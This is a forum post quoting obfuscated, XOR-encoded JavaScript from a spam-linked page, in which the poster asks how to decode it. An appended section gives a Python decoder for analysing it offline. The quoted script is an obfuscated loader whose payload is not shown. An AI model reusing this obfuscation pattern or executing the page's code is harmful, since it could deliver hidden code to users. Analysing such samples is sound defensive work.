benji: SPAM link leads to JavaScript that is encrypted! ....


Hello!

So, I regularly (every 2 days or so) get spam from someone, usually HTML mail with the content "video message" for you .... blah blah blah, today it was "hi sweetie, I didn't reply to you, here's a "personal link" just for you ...".

I never read this stuff, but for both types I downloaded the linked page and looked at the source, and it was always something like this:

<html>
<script language = "JavaScript">
var x='';x+='%3Cscript%20language%20%3D%20%22JavaScript%22%3Efunction%20d%28t%2Ck%29%7Bvar%20y%3D0%3Bvar%20r%3D%27%27%3Bt%3Dunescape%28t%29%3Bfor%20%28i%3D0%3Bi%3Ct%2Elength%3Bi%2B%2B%29%7Bx%3Dk%2EcharCodeAt%28y%29%3Bx2%3Dt%2EcharCodeAt%28i%29%3Bif%28x%21%3Dx2%29%7Br%3Dr%2BString%2EfromCharCode%28x2%5Ex%29%3B%7D';x+='else%7Br%3Dr%2BString%2EfromCharCode%28x%29%3B%7Dy%2B%2B%3Bif%28y%3D%3Dk%2Elength%29%7By%3D0%3B%7D%7Dreturn%28escape%28r%29%29%3B%7Dfunction%20D3N805P68G3VJ56R%28w%2Ck%29%7Bdocument%2Ewrite%28unescape%28d%28w%2Ck%29%29%29%3B%7Dvar%20k%3D%272787569790%27%3B%3C%2Fscript%3E';document.write(unescape(x));D3N805P68G3VJ56R('%0ED%5BE%5CFM%17UQ%5CPMVRS%19%0A%19%12xVNVfUK%5EID%10%09%5EB%5BUM%5EV%5E%12T%10%40%1CMOVK%10J%0A%08%0CSYK%17%11Y%0F%07%03%5E%09%1EN%19M%5FaCJ%5E%5BQ%11%1E%10%1E%5ERVPA%5E%02%5E%12%1B%1BL%40%1C%08%1EN%19M%5FaCJ%5E%5BQ%11%1E%10%1EQ%5FYEvY%5DRxD%1A%5E%11%1C%5C%0DDE%5CDGEV%1FM%1F%02JPV%12%1F%5B%1FfBK%5EWW%1B%16%05%03%04%03%0F%1EBX2787569790%0FzYC%5D%18KXL%5EV%1FuVA%5E%17EX%5EVXU%1F%1C%1C9%0E9%09%0B%0E%01%0E%1C%0DD%5E%5F%18%1AT%10dADPY%5E%18VX%5BBXSWC%17G%40%5ELR%1C%1F%10%16%04%04%02%03%08%1EN%5E%0B7%01%07%07%01%017%0C%06%04zXDZ%19JX%40X%5D%1FtQF%5F%16ETX%5DXT%18%1B%1D%01%0E%0C%0F9%0E9%09%1B%0CE%5ES%1EZ%1F%5D%1EFXkCG%5FWP%11%19%1B%16%05%10%01%039%0E%0C%17%1BLP%05%02%0E%0E%02%0F%09%05%0E%08%0AxWM%5F%17B%5DBVS%1D%7BXCQ%1E%40VVSZ%5B%11%1E%13%09%0B%0E%01%0E%0C%0F9%1E%02MW%5BKRN%5E%0B7%01%07%07%01%017%0C%06%04%06%09%09%02%018%07%07%079%0CDVGY%5BC%5CYW%17qd%7F%05%7Fc%04zsbw%7C%07%7D%0Cq%03b%01q%11G%1E%5C%11LCWK%17A%0D%07%01%0F%06%01%0F%0D%07%02%10Q%0AP%05%02%0E%0E%02%0F%09%05%0E%08%1AM%0D%19O%19%0D%12O%16CZeMEP%5EU%1F%11%0C%15%5D%04T%17D%5DdLE%5CX%5E%1F%10%0BVX%5BBXSWC%17G%40%5ELR%1DCWRJSSG%5D%1FQ%1EN%1BR%19%1B%1E%03J%09%19JTKYBC%06',k);HTM2GT1LJUNL5J4F6T8F('%0DCPAPFA%12%5BX%5FWFR%5ES%15%0F%17%1B%7BQERjUG%5BGM%13%0EUFWUA%5BXW%11S%1BD%10MCSE%19I%0D%03%08%5FYG%12%1FP%0C0%08Z%05%1EB%1CCVbDAZWQ%1D%1B%1E%17%5DU%5DTM%5E%0E%5B%1C%12%18KK%18%04%1EB%1CCVbDAZWQ
%1D%1B%1E%17RXRAzYQWvM%19Y%1A%18P%0DH%40RMDB%5D%1BA%1F%0EO%5E%5F%19%18P%1BjBG%5BY%5E%19U%40PXFP%1B%1E%10%10%0D%07%02%0C%06%1CI%5F%08%01%033%0A%0F%03%07%05%0E%04%7CQG%5B%17DZGY%5D%19%7DRGQ%18GSY%5D%5E%5D%1B%1A%13%0F%0C%0B%0E9%08%09%0A%1A%02K%5CT%1F%11R%18%60GK%5F%5BU%1FL%5FU%40PXFP%1B%1E%10%10%0D%07%07%0F%06%1CI%5F%08%01%033%0A%0F%03%07%05%0E%04%7CQG%5B%17DZGY%5D%19%7DRGQ%18GSY%5D%5E%5D%1B%1A%13%0F%0C%0B%0E9%08%09%0A%1A%02K%5D%03%07%0A%02%09%05%06%0B%01%0C%0F%06%0E1%03%03%0B%09%07%06%04%0CPW%10%1BP%11r%06%7C%0F%09%04%60%05%0B%7E%05cx%02%0Fc%1EG%5CjBG%5BY%5E%19%19%1A%13%18%0B%15%157%0C%09%04%14%1A%19M%5D%03%07%0A%02%09%05%06%0B%01%0C%0FzXEX%1DAVC%5BV%1FtPD%5B%1DKW%5BVXT%19%19%19%0A9%0F%0C%0B%0E9%08%19%08N%5FC%5BQCP%5E%5E%13g%09s%02%03%7D%0Avvk%7Dr%1EB%1E%5C%10JFRA%19N%08%06%02%0F%01%09%01%02%01%0D%15Q%0AQ1033965279%1CH%08%13A%16%08%12O%17E%5F%60GK%5F%5BU%1F%10%0A%10X%0EZ%18A%5DdMCY%5DT%11%1F%0EVXZD%5DV%5DM%18B%40%5EMT%18F%5D%5CEVSG%5C%19T%1BD%15%5D%1C%1B%1E%02L%0C%1C%40ZD%5CBC%07',k);T0E71J3GFXNK('%0DEUE%5DGD%19%5DY%5FQCVSR%10%04%11%1A%7BW%40VgTBPAL%13%08PBZTDP%5EV%11U%1E%40%1DLFXC%18I%0B%06%0CRXB%19%19Q%0C%06%0D%5E%08%1FG%17EWbBD%5EZP%18%10%18%16%5DSXP%40%5F%0BP%1A%13%18MN%1C%09%1FG%17EWbBD%5EZP%18%10%18%16R%5EWEwXT%5CpL%19%5F%1F%1C%5D%0CMKTLDDX%1FL%1E%0BDX%5E%11%1EU%1FgCBP%5F%5F%18%17%0B%03%05%02%06%10JP1667470918%0C%7BWC%5C%19BVDVU%1E%7BV%40%5F%1EKPVUY%5B%1F%1D%1D%099%08%01%08%0F%0F%0E%1D%0CMPW%10%19U%1Ed%40EYWV%10UYUBYR%5EM%1FOC%5FBR%1D%1E%19%18%0C%0C%01%02%06%1EO%5F%01%0F%07%0F%05%01%06%0E%05%0F%0DtPLY%18DXAYT%11%7CYE%5E%18EUYTV%5C%10%18%1C%0F%0E%0D%0E%099%08%01%18%0DK%5ER%1FS%11U%16EYeCF%5E%5E%5E%19%11%18%17%0B%104%02%099%04%1F%18M%5E%06%02%01%07%0D%06%08%08%07%0E%0AyVDQ%1FJ%5ECXS%1CzQMY%16CWXS%5BZ%18%10%1B%01%08%0F%0F%0E%0D%0E%09%10%0AETZERO%5F%01%0F%07%0F%05%01%06%0E%05%0F%0D9%01%08%01%07%07%06%06%07%0BDX%5E%11%1EU%... etc.  The forum system won't let me post all of it, so please tell me how it's done ...

11DZRKWTGW%1C%5D%19C%1BS%1D%1C%1E%09I%05%1EGTJ%5DEC%0C',k);J331421Q333CW067O0J('%0EDSD%5EBB%18%5EV%5CPEWPW%16%05%12%15xVFWdQDQBC%10%09VCYQBQ%5DY%12T%18A%1EI%40Y%40%17J%0A0%0DQ%5DD%18%1A%5E%0F%07%0B%5F%0B%1AA%16FXaCB%5FYU%1E%11%1B%19%5ER%5EQCZ%0DQ%19%1C%1BLH%1D%0A%1AA%16FXaCB%5FYU%1E%11%1B%19Q%5FQDt%5DR%5DsC%1A%5E%19%1D%5E%09KJWCGE%5E%1EO%1B%0DE%5BQ%12%1FS%1EdFDQ%5CP%1B%16%0D%02%06%076%11I%5F2706726827%0FzQB%5F%1CDWGYV%1F%7DWCZ%18JSYVX%5D%1E%1E%18%0F%01%0B%0E%0B%0E%09%0F%1E%09KQT%1F%1AT%18eC%40%5FVU%1FVXSCZWXL%1C%40%40%5EDS%1E%1B%1F%19%0F%03%02%030%1FLZ%04%0F%02%01%05%05%06%0E%05%05%0BuSCZ%19BYB%5CR%10%7FVF%5F%1EDV%5CRW%%04%0C%02%0D%01%042%05%0FxTEQ%1DF%5DE%5CQ%1D%7CXG%5C%1CBS%5BQ%5ET%1B%1D%18%09%0B%0C%0C%089%0A%0D%1B%0BOS%40%5FZG%5D%5D%5E%12%7F%04%01v%04%07%0A%60%7Fpe%04%7F%03%02te%1AB%19Z%10HBSB%12M%08%03%0C%02%03%04%01%06%05%0E%11Z%0E%5C%07%01%0B%06%01%03%09%01%01%1FH%09%15M%11%04%13L%1CD%15RYZUSV%5D%18TBV%14rYA%40YY%5EC%5DV%40P%5B%18%5E%5BYWXW%5B%1B%16%1B%7F%5FRUW%15%5C%5B%5D%17WQUSYY%5D%15%3A%3A%14%13%12%15%15%18Q%5EB%14%08%1F%1C%09%17SX%5E%40%0D%0E%1AA%5C%0B%3A%3A%14%13%0E%1AAJ%0B%3A%3A%08%1CFTWTP%09%3D%3E%0FPG%0B5%3F%0BRF%0D%3F%3F%09%17WXTM%0D%3F%3F%09%17%5DC%5DX%0D%3F%3F',k);
</script>
</html>

Nice, that is clearly an encrypted JavaScript, but how can I find out what it does?

[ I guess it does something like http://www.raus.de/crashme/ - nothing bad, just a simple script that makes the browser window drive around. Best to look at it with something like Opera, then you don't get the stupid little windows afterwards (at least not as annoyingly) ]

Whoever has decrypted it, just post it, the "evaluation" is no trouble after that.

Many thanks, cryp(t)oanalysts ;-)

benji
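The first `x+=` string in the quoted page is only URL-escaped; unescaping it reveals the decoder `d(t,k)` and the key `var k='2787569790'`. The payload arguments are then XORed byte by byte with that cycling key (a byte equal to the key byte is passed through as the key byte). The following Python script, an added example and not part of benji's post, re-implements that decoder so the page can be analysed offline instead of loading it in a browser; the key and the first 30 encoded characters of the payload are copied from the quoted source, and the `js_unescape` helper is my own stand-in for the legacy JavaScript `unescape()`.

```python
import re

# Key and payload prefix copied from the obfuscated page quoted in the post;
# the prefix is only the first 30 encoded characters of the first argument.
KEY = "2787569790"
PAYLOAD_PREFIX = "%0ED%5BE%5CFM%17UQ%5CPMVRS%19%0A%19%12xVNVfUK%5EID"
# Tail of the first-stage loader string from the post (contains the key).
LOADER_TAIL = "var%20k%3D%272787569790%27%3B%3C%2Fscript%3E"

_ESC = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")


def js_unescape(s: str) -> str:
    """Stand-in for the legacy JavaScript unescape(): %XX and %uXXXX become
    characters; malformed sequences (e.g. a stray '%%') are left untouched,
    which is also what the browser does."""
    return _ESC.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def extract_key(loader: str) -> str:
    """Read the key out of the unescaped first-stage loader ('var k=...')
    instead of executing it."""
    m = re.search(r"var k='([^']*)'", js_unescape(loader))
    if not m:
        raise ValueError("no key assignment found in loader")
    return m.group(1)


def xor_decode(payload: str, key: str) -> str:
    """Re-implementation of the page's d(t,k): unescape the payload, then XOR
    each character with the cycling key; a character equal to the current key
    character is emitted as that key character (the original does this so the
    XOR never yields a NUL)."""
    text = js_unescape(payload)
    out = []
    for i, ch in enumerate(text):
        k = ord(key[i % len(key)])
        c = ord(ch)
        out.append(chr(k if c == k else c ^ k))
    return "".join(out)


if __name__ == "__main__":
    key = extract_key(LOADER_TAIL)
    # Decodes to the opening of the next stage: <script language = "JavaScript
    print(xor_decode(PAYLOAD_PREFIX, key))
```

To decode the whole page, paste each complete quoted argument of the `D3N805P68G3VJ56R(...)`-style calls into `xor_decode` with the extracted key; the output is the second-stage script, which can then be read as plain text.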